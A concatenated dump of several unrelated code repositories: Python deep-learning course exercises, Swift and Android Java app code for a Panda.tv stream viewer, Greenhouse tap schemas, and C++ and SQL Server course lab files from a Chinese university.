] | 1 | Java | Jon-M-G/RandomizerPluginProject | 1f4b9fd2420f3ebc246f346918a554df85188325 | 29f6b3eacfd0200febe9fbb4a807698c4f4a7b99 |
refs/heads/master | <repo_name>jovanidesouza/prog1<file_sep>/main.java
class main{
public static void main(String args[]){
retangulo r;
r=new retangulo();
r1.width=10;
r1.height=11;
System.out.println(r.area());
System.out.println(r.perimetro());
}
} | d915c9eaf143e1df5d9b6390304f34f9f3b7ee7e | [
"Java"
] | 1 | Java | jovanidesouza/prog1 | eb703d5cbeb191f5f67b8dc504f16ff0de9fcbb7 | ba07f3d4bdb8d391c4762a40a9367b0c1da60a2f |
refs/heads/master | <repo_name>mohanakrishnavh/Deep-Learning-Specialization<file_sep>/Neural Networks & Deep Learning/Week4/Programming Assignments/nn_model.py
# -*- coding: utf-8 -*-
"""
Created on Sat Jan 27 16:16:51 2018
@author: Mohanakrishna
"""
<file_sep>/Neural Networks & Deep Learning/Week2/Vectorization/VectorizationDemo.py
# -*- coding: utf-8 -*-
"""
Created on Sat Jan 20 11:33:22 2018
@author: Mohanakrishna
"""
import time
import numpy as np
#Numpy array
a = np.array([1,2,3,4])
print(a)
#Vectorized version
a = np.random.rand(10000000)
b = np.random.rand(10000000)
tic = time.time()
c = np.dot(a,b)
toc = time.time()
print("Vectorized version: "+str(toc-tic)+" ms")
#Non-vectorized Version
c=0
tic = time.time()
for i in range(10000000):
c+=a[i]*b[i]
toc = time.time()
print("Non-Vectorized(\"for\" loop) version: "+str(toc-tic)+" ms")
<file_sep>/Neural Networks & Deep Learning/Week2/Vectorization/NumpyVectors.py
# -*- coding: utf-8 -*-
"""
Created on Sat Jan 20 19:34:37 2018
@author: Mohanakrishna
"""
import numpy as np
print("Inconsistent Implementation")
a = np.random.randn(5)
print(a)
print(a.shape) #rank1 array - neither a row nor column vector
print(a.T)
print(np.dot(a,a.T))
#Correct way of defining the random vector - avoiding rank1 vector
print("Consistent Implementation")
a = np.random.rand(5,1)
print(a)
print(a.T)
print(a,a.T)
'''
If unsure of the shape throw an assert statement
assert(a.shape ==(5,1)) - Inexpensive check
If you still end up with rank1 array, it can be reshaped
a = a.reshape((5,1))
'''
<file_sep>/Neural Networks & Deep Learning/Week2/Vectorization/VectorizationExamples.py
# -*- coding: utf-8 -*-
"""
Created on Sat Jan 20 11:48:36 2018
@author: Mohanakrishna
"""
import numpy as np
v = [1,2,3,4]
u = np.exp(v)
print(u)
#Try the below:
#np.log(v)
#np.abs(v)
#np.maximum(v,0)
#v**2
#1/v<file_sep>/Neural Networks & Deep Learning/Week2/Vectorization/BroadcastingDemo.py
# -*- coding: utf-8 -*-
"""
Created on Sat Jan 20 12:27:33 2018
@author: Mohanakrishna
"""
import numpy as np
A = np.array([[56.0,0.0,4.4,68.0],
[1.2,104.0,52.0,8.0],
[1.8,135.0,99.0,0.9]])
print(A)
cal = A.sum(axis=0)
print(cal)
percentage = 100*A/cal.reshape(1,4) #advised to reshape to resulting shape
print(percentage) | b0b8cc4dbad6b65a5f3c8c448f4b0635ba94ac1c | [
"Python"
] | 5 | Python | mohanakrishnavh/Deep-Learning-Specialization | 4af2d47bfa5ff6f5f5e784f46769640a213bb179 | ff3152d6a563bbd61d5ecaf081e9336a153ef0bd |
refs/heads/main | <file_sep># DatePickerInSwiftUI

<file_sep>//
// ContentView.swift
// DatePickerInSwiftUI
//
// Created by <NAME> on 24.06.2020.
//
import SwiftUI
struct ContentView: View {
@State private var selectedDate = Date()
var body: some View {
VStack {
Spacer()
Text("\(selectedDate)")
Spacer()
VStack {
DatePicker("Select date", selection: $selectedDate)
.padding()
}.padding()
}.padding()
}
}
struct ContentView_Previews: PreviewProvider {
static var previews: some View {
ContentView()
}
}
<file_sep>//
// DatePickerInSwiftUIApp.swift
// DatePickerInSwiftUI
//
// Created by <NAME> on 24.06.2020.
//
import SwiftUI
@main
struct DatePickerInSwiftUIApp: App {
var body: some Scene {
WindowGroup {
ContentView()
}
}
}
| 4520610247fe720ed8bdb9b71ab6a1c46d298968 | [
"Markdown",
"Swift"
] | 3 | Markdown | ram4ik/DatePickerInSwiftUI | 0c929a1f8f2c265bc1bda6de69a8a740316d66b1 | 7ed22bdfbbb54cbea2b9460f7620da5fbf1af01b |
refs/heads/master | <repo_name>isabella232/tap-greenhouse<file_sep>/tap_greenhouse/streams/scheduled_interviews.py
from tap_kit.streams import Stream
class ScheduledInterview(Stream):
stream = "scheduled_interviews"
meta_fields = dict(
key_properties=['id'],
replication_key='updated_at',
valid_replication_keys=['updated_at'],
incremental_search_key='updated_at',
replication_method='incremental',
selected_by_default=True
)
schema = {
"type": ["null", "object"],
"properties": {
"id": {
"type": ["null", "integer"]
},
"application_id": {
"type": ["null", "integer"]
},
"external_event_id": {
"type": ["null", "string"]
},
"start": {
"type": ["null", "object"],
"properties": {
"date_time": {
"type": ["null", "string"],
"format": "date-time"
}
}
},
"end": {
"type": ["null", "object"],
"properties": {
"date_time": {
"type": ["null", "string"],
"format": "date-time"
}
}
},
"location": {
"type": ["null", "string"]
},
"video_conferencing_url": {
"type": ["null", "string"]
},
"status": {
"type": ["null", "string"]
},
"created_at": {
"type": ["null", "string"],
"format": "date-time"
},
"updated_at": {
"type": ["null", "string"],
"format": "date-time"
},
"interview": {
"type": ["null", "object"],
"properties": {
"id": {
"type": ["null", "integer"]
},
"name": {
"type": ["null", "string"]
}
}
},
"organizer": {
"type": ["null", "object"],
"properties": {
"id": {"type": ["null", "integer"]},
"first_name": {"type": ["null", "string"]},
"last_name": {"type": ["null", "string"]},
"name": {"type": ["null", "string"]},
"employee_id": {"type": ["null", "string"]},
}
},
"interviewers": {
"type": ["null", "array"],
"items": {
"type": ["null", "object"],
"properties": {
"id": {"type": ["null", "integer"]},
"employee_id": {"type": ["null", "string"]},
"name": {"type": ["null", "string"]},
"email": {"type": ["null", "string"]},
"response_status": {"type": ["null", "string"]},
"scorecard_id": {"type": ["null", "integer"]},
}
}
}
}
}<file_sep>/tap_greenhouse/streams/scorecards.py
from tap_kit.streams import Stream
class Scorecards(Stream):
stream = "scorecards"
meta_fields = dict(
key_properties=['id'],
replication_key='updated_at',
valid_replication_keys=['updated_at'],
incremental_search_key='updated_at',
replication_method='incremental',
selected_by_default=True
)
schema = {
"type": ["null", "object"],
"properties": {
"id": {
"type": ["null", "integer"]
},
"updated_at": {
"type": ["null", "string"]
},
"created_at": {
"type": ["null", "string"]
},
"interview": {
"type": ["null", "string"]
},
"interview_step": {
"type": "object",
"properties": {
"id": {
"type": ["null", "integer"]
},
"name": {
"type": ["null", "string"]
}
}
},
"candidate_id": {
"type": ["null", "integer"]
},
"application_id": {
"type": ["null", "integer"]
},
"interviewed_at": {
"type": ["null", "string"],
"format": "date-time"
},
"submitted_by": {
"type": "object",
"properties": {
"id": {
"type": ["null", "integer"]
},
"first_name": {
"type": ["null", "string"]
},
"last_name": {
"type": ["null", "string"]
},
"name": {
"type": ["null", "string"]
},
"employee_id": {
"type": ["null", "string"]
}
}
},
"interviewer": {
"type": "object",
"properties": {
"id": {
"type": ["null", "integer"]
},
"first_name": {
"type": ["null", "string"]
},
"last_name": {
"type": ["null", "string"]
},
"name": {
"type": ["null", "string"]
},
"employee_id": {
"type": ["null", "string"]
}
},
},
"submitted_at": {
"type": ["null", "string"],
"format": "date-time"
},
"overall_recommendation": {
"type": ["null", "string"]
},
"attributes": {
"type": "array",
"items":
{
"type": "object",
"properties": {
"name": {
"type": ["null", "string"]
},
"type": {
"type": ["null", "string"]
},
"note": {
"type": ["null", "string"]
},
"rating": {
"type": ["null", "string"]
}
}
}
},
"ratings": {
"type": "object",
"properties": {
"definitely_not": {
"type": "array",
"items":
{
"type": ["null", "string"]
}
},
"no": {
"type": "array",
"items":
{
"type": ["null", "string"]
}
},
"mixed": {
"type": "array",
"items":
{
"type": ["null", "string"]
}
},
"yes": {
"type": "array",
"items":
{
"type": ["null", "string"]
}
},
"strong_yes": {
"type": "array",
"items": {
"type": ["null", "string"]
}
}
}
},
"questions": {
"type": "array",
"items":
{
"type": "object",
"properties": {
"id": {
"type": ["null", "integer"]
},
"question": {
"type": ["null", "string"]
},
"answer": {
"type": ["null", "string"]
}
}
}
}
}
}
| cc059bd8b8f08d4bcf0387267a8089b22f704df4 | [
"Python"
] | 2 | Python | isabella232/tap-greenhouse | 53b93038e23dae4458361367f9e9fddd26c692f5 | 263cae6c8c40e7d24ce737a19915cce9de4e64b5 |
refs/heads/master | <repo_name>ly774508966/StreamBox<file_sep>/app/src/main/java/io/playcode/streambox/data/bean/PandaStreamEntity.java
package io.playcode.streambox.data.bean;
/**
* Created by anpoz on 2017/4/14.
*/
public class PandaStreamEntity {
/**
* errno : 0
* errmsg :
* data : {"hostinfo":{"rid":"29544914","name":"小马AAAAAA","avatar":"http://i9.pdim.gs/fab3da6d679bbd75c45a92639a6ffa9a.jpeg","bamboos":"8931979"},"roominfo":{"id":"16688","name":"今天提前溜。要去LSPL现场助阵!","classification":"英雄联盟","cate":"lol","bulletin":"直播时间12点-6点 有时候加班!\n ","person_num":"230072","fans":"0","pictures":{"img":"http://i5.pdim.gs/90/f1428c8c77436b26a808c7ff4989f6c3/w338/h190.jpg"},"display_type":"1","start_time":"1492142299","end_time":"1492080996","room_type":"1","status":"2"},"videoinfo":{"address":"http://pl-hls3.live.panda.tv/live_panda/7d9bdfd8beca4be796bc4b757503decd_small.m3u8","watermark":"1"}}
* authseq :
*/
private String errno;
private String errmsg;
private DataEntity data;
private String authseq;
public String getErrno() {
return errno;
}
public void setErrno(String errno) {
this.errno = errno;
}
public String getErrmsg() {
return errmsg;
}
public void setErrmsg(String errmsg) {
this.errmsg = errmsg;
}
public DataEntity getData() {
return data;
}
public void setData(DataEntity data) {
this.data = data;
}
public String getAuthseq() {
return authseq;
}
public void setAuthseq(String authseq) {
this.authseq = authseq;
}
public static class DataEntity {
/**
* hostinfo : {"rid":"29544914","name":"小马AAAAAA","avatar":"http://i9.pdim.gs/fab3da6d679bbd75c45a92639a6ffa9a.jpeg","bamboos":"8931979"}
* roominfo : {"id":"16688","name":"今天提前溜。要去LSPL现场助阵!","classification":"英雄联盟","cate":"lol","bulletin":"直播时间12点-6点 有时候加班!\n ","person_num":"230072","fans":"0","pictures":{"img":"http://i5.pdim.gs/90/f1428c8c77436b26a808c7ff4989f6c3/w338/h190.jpg"},"display_type":"1","start_time":"1492142299","end_time":"1492080996","room_type":"1","status":"2"}
* videoinfo : {"address":"http://pl-hls3.live.panda.tv/live_panda/7d9bdfd8beca4be796bc4b757503decd_small.m3u8","watermark":"1"}
*/
private HostinfoEntity hostinfo;
private RoominfoEntity roominfo;
private VideoinfoEntity videoinfo;
public HostinfoEntity getHostinfo() {
return hostinfo;
}
public void setHostinfo(HostinfoEntity hostinfo) {
this.hostinfo = hostinfo;
}
public RoominfoEntity getRoominfo() {
return roominfo;
}
public void setRoominfo(RoominfoEntity roominfo) {
this.roominfo = roominfo;
}
public VideoinfoEntity getVideoinfo() {
return videoinfo;
}
public void setVideoinfo(VideoinfoEntity videoinfo) {
this.videoinfo = videoinfo;
}
public static class HostinfoEntity {
/**
* rid : 29544914
* name : 小马AAAAAA
* avatar : http://i9.pdim.gs/fab3da6d679bbd75c45a92639a6ffa9a.jpeg
* bamboos : 8931979
*/
private String rid;
private String name;
private String avatar;
private String bamboos;
public String getRid() {
return rid;
}
public void setRid(String rid) {
this.rid = rid;
}
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public String getAvatar() {
return avatar;
}
public void setAvatar(String avatar) {
this.avatar = avatar;
}
public String getBamboos() {
return bamboos;
}
public void setBamboos(String bamboos) {
this.bamboos = bamboos;
}
}
public static class RoominfoEntity {
/**
* id : 16688
* name : 今天提前溜。要去LSPL现场助阵!
* classification : 英雄联盟
* cate : lol
* bulletin : 直播时间12点-6点 有时候加班!
* person_num : 230072
* fans : 0
* pictures : {"img":"http://i5.pdim.gs/90/f1428c8c77436b26a808c7ff4989f6c3/w338/h190.jpg"}
* display_type : 1
* start_time : 1492142299
* end_time : 1492080996
* room_type : 1
* status : 2
*/
private String id;
private String name;
private String classification;
private String cate;
private String bulletin;
private String person_num;
private String fans;
private PicturesEntity pictures;
private String display_type;
private String start_time;
private String end_time;
private String room_type;
private String status;
public String getId() {
return id;
}
public void setId(String id) {
this.id = id;
}
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public String getClassification() {
return classification;
}
public void setClassification(String classification) {
this.classification = classification;
}
public String getCate() {
return cate;
}
public void setCate(String cate) {
this.cate = cate;
}
public String getBulletin() {
return bulletin;
}
public void setBulletin(String bulletin) {
this.bulletin = bulletin;
}
public String getPerson_num() {
return person_num;
}
public void setPerson_num(String person_num) {
this.person_num = person_num;
}
public String getFans() {
return fans;
}
public void setFans(String fans) {
this.fans = fans;
}
public PicturesEntity getPictures() {
return pictures;
}
public void setPictures(PicturesEntity pictures) {
this.pictures = pictures;
}
public String getDisplay_type() {
return display_type;
}
public void setDisplay_type(String display_type) {
this.display_type = display_type;
}
public String getStart_time() {
return start_time;
}
public void setStart_time(String start_time) {
this.start_time = start_time;
}
public String getEnd_time() {
return end_time;
}
public void setEnd_time(String end_time) {
this.end_time = end_time;
}
public String getRoom_type() {
return room_type;
}
public void setRoom_type(String room_type) {
this.room_type = room_type;
}
public String getStatus() {
return status;
}
public void setStatus(String status) {
this.status = status;
}
public static class PicturesEntity {
/**
* img : http://i5.pdim.gs/90/f1428c8c77436b26a808c7ff4989f6c3/w338/h190.jpg
*/
private String img;
public String getImg() {
return img;
}
public void setImg(String img) {
this.img = img;
}
}
}
public static class VideoinfoEntity {
/**
* address : http://pl-hls3.live.panda.tv/live_panda/7d9bdfd8beca4be796bc4b757503decd_small.m3u8
* watermark : 1
*/
private String address;
private String watermark;
public String getAddress() {
return address;
}
public void setAddress(String address) {
this.address = address;
}
public String getWatermark() {
return watermark;
}
public void setWatermark(String watermark) {
this.watermark = watermark;
}
}
}
}
<file_sep>/app/src/main/java/io/playcode/streambox/ui/pandastream/PandaStreamPresenter.java
package io.playcode.streambox.ui.pandastream;
import android.text.TextUtils;
import com.blankj.aloglibrary.ALog;
import com.google.gson.Gson;
import com.koushikdutta.async.AsyncServer;
import com.koushikdutta.async.Util;
import com.koushikdutta.async.future.Cancellable;
import org.greenrobot.eventbus.EventBus;
import org.reactivestreams.Publisher;
import org.reactivestreams.Subscription;
import io.playcode.streambox.data.bean.PandaDanmuEntity;
import io.playcode.streambox.data.bean.PandaStreamDanmuServerEntity;
import io.playcode.streambox.data.bean.PandaStreamEntity;
import io.playcode.streambox.data.bean.StreamInfoEntity;
import io.playcode.streambox.data.source.AppRepository;
import io.playcode.streambox.event.PandaDanmuEvent;
import io.playcode.streambox.event.StreamInfoEvent;
import io.playcode.streambox.util.PandaDanmuUtil;
import io.reactivex.BackpressureStrategy;
import io.reactivex.Flowable;
import io.reactivex.FlowableOnSubscribe;
import io.reactivex.FlowableSubscriber;
import io.reactivex.Observer;
import io.reactivex.android.schedulers.AndroidSchedulers;
import io.reactivex.annotations.NonNull;
import io.reactivex.disposables.CompositeDisposable;
import io.reactivex.disposables.Disposable;
import io.reactivex.functions.Function;
import io.reactivex.schedulers.Schedulers;
import io.reactivex.subscribers.DefaultSubscriber;
/**
* Created by anpoz on 2017/4/14.
*/
public class PandaStreamPresenter implements PandaStreamContract.Presenter {
private PandaStreamContract.View mView;
private CompositeDisposable mCompositeDisposable;
private String roomId;
private String address;
private Cancellable mCancellable;
public PandaStreamPresenter(PandaStreamContract.View view) {
mView = view;
mView.setPresenter(this);
mCompositeDisposable = new CompositeDisposable();
}
@Override
public void subscribe() {
}
@Override
public void unSubscribe() {
mCompositeDisposable.clear();
mCancellable.cancel();
EventBus.getDefault().removeStickyEvent(PandaDanmuEvent.class);
}
@Override
public void setRoomId(String id) {
roomId = id;
ALog.d(id);
AppRepository.getInstance()
.getPandaStreamRoom(roomId)
.subscribeOn(Schedulers.io())
.observeOn(AndroidSchedulers.mainThread())
.subscribe(new Observer<PandaStreamEntity>() {
@Override
public void onSubscribe(Disposable d) {
mCompositeDisposable.add(d);
}
@Override
public void onNext(PandaStreamEntity pandaStreamEntity) {
address = pandaStreamEntity.getData().getVideoinfo().getAddress();
StreamInfoEntity infoEntity = new StreamInfoEntity();
infoEntity.setLive_id(pandaStreamEntity.getData().getRoominfo().getId());
infoEntity.setLive_img(pandaStreamEntity.getData().getHostinfo().getAvatar());
infoEntity.setLive_nickname(pandaStreamEntity.getData().getHostinfo().getName());
infoEntity.setLive_title(pandaStreamEntity.getData().getRoominfo().getName());
infoEntity.setLive_online(pandaStreamEntity.getData().getRoominfo().getPerson_num());
infoEntity.setPush_time(pandaStreamEntity.getData().getRoominfo().getStart_time());
infoEntity.setLive_type("pandatv");
EventBus.getDefault().postSticky(new StreamInfoEvent(infoEntity));
mView.updateStreamAddress(address, pandaStreamEntity.getData().getRoominfo().getName());
}
@Override
public void onError(Throwable e) {
e.printStackTrace();
}
@Override
public void onComplete() {
}
});
AppRepository.getInstance()
.getPandaDanmuServer(id)
.subscribeOn(Schedulers.io())
.observeOn(AndroidSchedulers.mainThread())
.subscribe(new Observer<PandaStreamDanmuServerEntity>() {
@Override
public void onSubscribe(Disposable d) {
mCompositeDisposable.add(d);
}
@Override
public void onNext(PandaStreamDanmuServerEntity pandaStreamDanmuServerEntity) {
connectDanmuSocket(pandaStreamDanmuServerEntity);
}
@Override
public void onError(Throwable e) {
e.printStackTrace();
}
@Override
public void onComplete() {
}
});
}
private void connectDanmuSocket(PandaStreamDanmuServerEntity danmuServerEntity) {
String[] address = danmuServerEntity.getData().getChat_addr_list().get(0).split(":");
mCancellable = AsyncServer.getDefault().connectSocket(address[0], Integer.valueOf(address[1]), (ex, socket) ->
Util.writeAll(socket, PandaDanmuUtil.getConnectData(danmuServerEntity.getData()), ex1 -> {
socket.setDataCallback((emitter, bb) ->
parseDanmu(bb.getAllByteArray()));
}));
}
private void parseDanmu(byte[] data) {
Flowable.create((FlowableOnSubscribe<String>) e -> {
//弹幕协议头
if (data[0] == PandaDanmuUtil.RECEIVE_MSG[0] &&
data[1] == PandaDanmuUtil.RECEIVE_MSG[1] &&
data[2] == PandaDanmuUtil.RECEIVE_MSG[2] &&
data[3] == PandaDanmuUtil.RECEIVE_MSG[3]) {
//{"type":"1","time":1477356608,"data":{"from":{"__plat":"android","identity":"30","level":"4","msgcolor":"","nickName":"看了还说了","rid":"45560306","sp_identity":"0","userName":""},"to":{"toroom":"15161"},"content":"我去"}}
String content = new String(data, "UTF-8");
//第一条弹幕
int danmuFromIndex = content.indexOf("{\"type");
int danmuToIndex = content.indexOf("}}");
//第二条弹幕(可有)
int danmuFromIndex_2 = content.lastIndexOf("{\"type");
int danmuToIndex_2 = content.lastIndexOf("}}");
String danmu;//存放弹幕
danmu = content.substring(danmuFromIndex, danmuToIndex + 2);
if (TextUtils.isEmpty(danmu)) {//为空不发射事件
e.onComplete();
}
e.onNext(danmu);
//如果存在第二条弹幕
if (!(danmuFromIndex == danmuFromIndex_2 &&
danmuToIndex == danmuToIndex_2)) {
danmu = content.substring(danmuFromIndex_2, danmuToIndex_2 + 2);
if (TextUtils.isEmpty(danmu)) {
e.onComplete();
}
e.onNext(danmu);
}
e.onComplete();
} else if (data[0] == PandaDanmuUtil.HEART_BEAT_RESPONSE[0] &&//心跳包
data[1] == PandaDanmuUtil.HEART_BEAT_RESPONSE[1] &&
data[2] == PandaDanmuUtil.HEART_BEAT_RESPONSE[2] &&
data[3] == PandaDanmuUtil.HEART_BEAT_RESPONSE[3]) {
e.onComplete();
}
}, BackpressureStrategy.DROP)
.flatMap(new Function<String, Publisher<PandaDanmuEntity>>() {
@Override
public Publisher<PandaDanmuEntity> apply(@NonNull String s) throws Exception {
return Flowable.create(e -> {
//解析弹幕Json
PandaDanmuEntity danmu = new Gson().fromJson(s, PandaDanmuEntity.class);
e.onNext(danmu);
e.onComplete();
}, BackpressureStrategy.BUFFER);
}
})
.subscribeOn(Schedulers.io())
.subscribe(new FlowableSubscriber<PandaDanmuEntity>() {
@Override
public void onSubscribe(@NonNull Subscription s) {
s.request(10);
}
@Override
public void onNext(PandaDanmuEntity danmuEntity) {
EventBus.getDefault().post(new PandaDanmuEvent(danmuEntity));
}
@Override
public void onError(Throwable t) {
t.printStackTrace();
}
@Override
public void onComplete() {
}
});
}
}
| f139d32357699cea55a49f14f92f06c36306d0a4 | [
"Java"
] | 2 | Java | ly774508966/StreamBox | c16a1bc03a2b0b2ff9764ff0c03cd5a7a375ec05 | 695831228ea973551c42cfe6d7e7a1880956f278 |
refs/heads/master | <repo_name>FnEsc/Course-Code<file_sep>/CPlus_Source/Chapter4/4_4.h
#pragma once
#include<iostream>
using namespace std;
bool is_prime(int x) {
for (int i = 2; i <= x / 2; i++) {
if (x%i == 0) {
return 0;
}
}
return 1;
}
void main_4_4() {
int a, b;
cout << "输入两个偶数(2起),范围内证明哥德巴赫猜想:";
cin >> a >> b;
int min = a >= b ? b : a;
int max = a >= b ? a : b;
bool flag;
for (int i = min; i <= max; i += 2) {
flag = 0;
for (int j = 2; j < i; j++) {
if (is_prime(j) && (is_prime(i - j))) {
cout << i << "=" << j << "+" << i - j << endl;
flag = 1;
break;
}
}
if (!flag)
{
cout << "???" << endl;
};
}
}
<file_sep>/CPlus_Source/Shiyan3/main_1.h
#pragma once
int main_1();<file_sep>/CPlus_Source/Shiyan4/Employee.h
#pragma once
#include"Person.h"
#include<iostream>
class Employee:public Person
{
public:
Employee(int id0, const char* name0); //创建Employee时候要给id和名字
~Employee();
virtual void calculation();
virtual void display();
private:
};
Employee::Employee(int id0, const char* name0) {
id = id0;
strcpy_s(name, name0);
}
Employee::~Employee()
{
}
void Employee::calculation() {
salary = 10000;
}
void Employee::display() {
std::cout << "这个id为" << id << "名字为" << name << "的工资是:" << salary << std::endl;
}<file_sep>/CPlus_Source/Shiyan4/4_2.h
#pragma once
#include<iostream>
using namespace std;
class T {
int x, y;
public:
T(int a, int b) { x = a; y = b; }
friend ostream & operator<<(ostream &os, T &a);
};
ostream& operator<<(ostream &os, T &a) //返回类型是ostream& 重载操作符<<
{
os << "x=" << a.x << " y=" << a.y;
return os;
}
void main_4_2()
{
T a(1, 2);
cout << a << endl;
}
<file_sep>/CPlus_Source/Shiyan2/box.h
#pragma once
#include<iostream>
#include<windows.h>
using namespace std;
class Box
{
private:
double length, width, height, volume;
public:
void setProperty() {
cout << "请依次输入长方柱的长、宽、高(用空格分开):";
cin >> length >> width >> height;
}
void V_calculation() {
volume = length * width*height;
}
void V_output() {
cout << "计算出的长方柱的体积为:" << volume << endl;
}
};
int main_box();
<file_sep>/CPlus_Source/Shiyan2/const_text.h
#pragma once
#include <iostream>
using namespace std;
class R
{
public:
R(int r1 = 0) : R1(r1) {};
void print();
void print() const;
private:
int R1;
};
int main_const_text();
<file_sep>/CPlus_Source/Shiyan3/3_3.h
#pragma once
#include<iostream>
#include"birthday.h"
using namespace std;
int main_3_3()
{
char n[50];
int i, s, y, m, d;
cout << "请输入学生姓名: ";
cin >> n;
cout << "请输入学生学号和成绩: ";
cin >> i >> s;
cout << "请输入学生的生日: ";
cin >> y >> m >> d;
Date d1(y, m, d);
d1.display();
Student s1(i, s, n);
s1.display();
return 0;
}
<file_sep>/SQL_SERVER_Experiment/README.md
# SQL SERVER experiment
Fosu University Course SQL SERVER Code Source
佛山科学技术学院 SQL课程实验源代码
# How to use
Get this repo and copy the code into sql console
<file_sep>/CPlus_Source/Chapter1/1_2.h
#pragma once
#include<iostream>
using namespace std;
int main_1_2() {
int count;
float obs, sum;
cout << "Type your observation." << endl;
cout << "Type 0 after the last!" << endl;
count = 0;
sum = 0;
cin >> obs;
while (obs > 0) {
sum += obs;
count++;
cin >> obs;
}
if (count == 0) {
cout << "Your did not write any observations!" << endl;
}
else {
cout << "Number of observation given:" << count << endl;
};
cout << "Average value:" << sum / count << endl;
return 0;
}
<file_sep>/SQL_SERVER_Experiment/shiyan_4.sql
use xskc
INSERT INTO Student(Sno,Sname,Ssex,Sdept,Sage) VALUES('200215128','陈冬','男','IS',18);
INSERT INTO Student VALUES('200215129','陈冬','男',18,'IS');
INSERT INTO SC(Sno,Cno) VALUES('200215128','1');
UPDATE Student SET Sage=31 WHERE Sno='200215129'
SELECT * FROM Student
UPDATE Student SET Sage = Sage+1
UPDATE SC SET Grade=0 WHERE 'CS' = (SELECT Sdept FROM Student WHERE Student.Sno=SC.Sno)
DELETE FROM SC WHERE Sno='200215128'
DELETE FROM Student WHERE Sno='200215128'
SELECT * FROM Student
SELECT * FROM SC
DELETE FROM SC
DELETE FROM SC WHERE 'CS'=(SELECT Sdept FROM Student WHERE Student.Sno=SC.Sno) --删除计算机科学系所有学生的选课记录
CREATE TABLE History_Student(
Sno CHAR(9) PRIMARY KEY,
Sname CHAR(8) NOT NULL,
Ssex CHAR(2) DEFAULT '男' CHECK(Ssex in ('男','女')),
Sage INT,
Sdept CHAR(20)
);
INSERT INTO History_Student SELECT * FROM Student;
SELECT * FROM History_Student
--END实验<file_sep>/CPlus_Source/Chapter4/4_5.h
#pragma once
#include<iostream>
#include<stdlib.h>
using namespace std;
void main_4_5() {
cout << rand() % 52 + 1 << "\t" << rand() % 52 + 1 << "\t" << rand() % 52 + 1 << endl; // 随机产生3个1-52的数
for (int i = 0; i < 10; i++) {
static int z = 0; //无static:0000000000 有static:0123456789
cout << z;
z++;
//i = 9; //这个i会改变循环的i,循环次数改变
}
}
<file_sep>/CPlus_Source/Shiyan4/Person.h
#pragma once
class Person
{
public:
Person();
~Person();
virtual void calculation()=0;
virtual void display()=0;
protected:
int id;
char name[15];
float salary=0;
};
Person::Person()
{
}
Person::~Person()
{
}
<file_sep>/CPlus_Source/Chapter2/max_3.h
#pragma once
#include<iostream>
using namespace std;
int main_3() {
float a, b, c, max;
cin >> a >> b >> c;
max = a > b ? a : b;
max = max > c ? max : c;
cout << max;
return 0;
}
<file_sep>/CPlus_Source/Shiyan4/shape.h
#pragma once
// shape.h文件 定义抽象基类Shape
#ifndef Shape
class Shape
{
public:
virtual double Area() const
{
return 0.0;
}
// 纯虚函数,在派生类中重载
virtual void PrintShapeName() const = 0;
virtual void Print() const = 0;
};
#endif // !Shape
<file_sep>/CPlus_Source/Chapter3/3_2_8.h
#pragma once
#include<iostream>
using namespace std;
void main_3_2_8() {
int choice;
std::cout << "Çë×ö³öÑ¡Ôñ£º" << std::endl << "1.Apple" << std::endl << "2.Banana" << std::endl;
std::cin >> choice;
switch (choice)
{
case 1:std::cout << "You choose Apple" << std::endl; break;
case 2:std::cout << "You choose Banana" << std::endl; break;
default:
std::cout << "You choose what???" << std::endl;
break;
}
}<file_sep>/CPlus_Source/Shiyan1/swap.h
#pragma once
#include<iostream>
using namespace std;
int main_swap(){
int a, b, t;
cout << "学号:20160310321\t" << "学生:林上满" << endl;
cout << "请输入两个数(用空格分开):";
cin >> a >> b;
t = a; //进行交换
a = b;
b = t;
cout << "交换后两个数分别是:" << a << " " << b << endl;
return 0;
}
<file_sep>/CPlus_Source/Shiyan4/cixu.h
#pragma once
#include <iostream>
using namespace std;
class A
{
public:
A()
{
cout << "Constructor1_A" << 1 << endl;
}
A(int m) : x(m)
{
cout << "Constructor2_A" << x << endl;
}
~A()
{
cout << "Destructor_A" << x << endl;
}
private:
int x;
};
class B : public A
{
public:
B()
{
cout << "Constructor1_B" << y << endl;
}
B(int m, int n, int x, int T) : b(n), a(x), y(T)
{
cout << "Constructor2_B" << y << endl;
}
~B()
{
cout << "Destructor_B" << y << endl;
}
private:
int y;
A a;
A b;
};
int main_cixu()
{
B b2(5, 6, 7, 8);
return 0;
}
<file_sep>/CPlus_Source/Chapter5/single.h
#pragma once
#include<iostream>
using namespace std;
class SINGLE_INSTANCE
{
public:
SINGLE_INSTANCE();
~SINGLE_INSTANCE();
private:
static int instance_count;
};
SINGLE_INSTANCE::SINGLE_INSTANCE()
{
instance_count += 1;
if (instance_count > 1)cout << "Warning: more than one object instance!" << endl;
return;
}
SINGLE_INSTANCE::~SINGLE_INSTANCE()
{
instance_count -= 1;
return;
}
int SINGLE_INSTANCE::instance_count = 0;//初始化静态数据成员变量
void main_single() {
//创建第一个对象
cout << "I HAVE THE FIRST OBJECT." << endl;
SINGLE_INSTANCE obj1;
//创建第二个对象
cout << "I HAVE THE SECOND OBJECT." << endl;
SINGLE_INSTANCE obj2;
return;
}<file_sep>/CPlus_Source/Shiyan2/person_2.cpp
#include"pch.h"
#include "person_2.h"
Person_2::Person_2() : m_nAge(0), m_nSex(0)//构造函数
{
strcpy_s(m_strName, "XXX");
}
Person_2::Person_2(const char *name, int age, char sex) : m_nAge(age), m_nSex(sex == 'm' ? 0 : 1)//构造函数
{
strcpy_s(m_strName, name);
}
Person_2::Person_2(const Person_2 &p) : m_nAge(p.m_nAge), m_nSex(p.m_nSex)//拷贝构造函数
{
strcpy_s(m_strName, p.m_strName);
}
void Person_2::SetName(const char *name)
{
strcpy_s(m_strName, name);
}
void Person_2::SetAge(int age)
{
m_nAge = age;
}
void Person_2::setSex(char sex)
{
m_nSex = sex == 'm' ? 0 : 1;
}
char* Person_2::GetName()
{
return m_strName;
}
int Person_2::GetAge()
{
return m_nAge;
}
char Person_2::GetSex()
{
return (m_nSex == 0 ? 'm' : 'f');
}
void Person_2::ShowPerson_2()
{
cout << GetName() << '\t' << GetAge() << '\t' << GetSex() << endl;
}
int main_person_2() {
Person_2 *p1, *p2; //声明两个指向对象的指针
p1 = new Person_2; //动态生成一个Person_2对象
cout << "person1: \t";
p1->ShowPerson_2();
p1->SetAge(19);
cout << "person1: \t";
p1->ShowPerson_2();
